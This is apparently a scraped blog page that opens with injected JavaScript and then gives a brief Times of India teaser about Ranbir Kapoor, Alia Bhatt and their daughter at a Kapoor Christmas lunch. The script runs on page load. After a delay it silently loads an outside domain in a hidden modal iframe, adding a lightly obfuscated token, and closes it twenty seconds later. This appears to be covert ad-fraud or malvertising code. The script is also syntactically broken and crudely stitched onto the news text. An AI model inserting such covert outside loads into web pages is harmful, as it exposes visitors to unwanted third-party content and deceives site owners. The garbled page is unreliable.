function xorEncryptDecrypt(input, key) {
let result = '';
for (let i = 0; i < input.length; i++) {
result += String.fromCharCode(input.charCodeAt(i) ^ key.charCodeAt(i % key.length));
}
return result;
}
function generateUniqueToken() {
return Math.random().toString(36).substring(2, 15) + Math.random().toString(36).substring(2, 15);
}
function openModalWithLink(link) {
document.getElementById('modalIframe').src = link;
document.getElementById('myModal').style.display = 'block';
}
function closeModal() {
document.getElementById('myModal').style.display = 'none';
}
var uniqueToken = generateUniqueToken();
var encryptionKey = 'YourEncryptionKey';
var encryptedToken = xorEncryptDecrypt(uniqueToken, encryptionKey);
setTimeout(function () {
var link "//doruffleton.com/4/6805431?key=' + encodeURIComponent(encryptedToken);
openModalWithLink(link);
setTimeout(function () {
closeModal();
}, 20000);
}, 5000);
/>Ranbir Kapoor and Alia Bhatt along with their daughter Raha attended the annual Christmas lunch of the Kapoors and a video of the cake-cutting has caught the attention of netizens!
from Entertainment News, Celebrity News, Latest Movie News, Breaking News | Entertainment - Times of India https://ift.tt/hmSEVWP
Comments
Post a Comment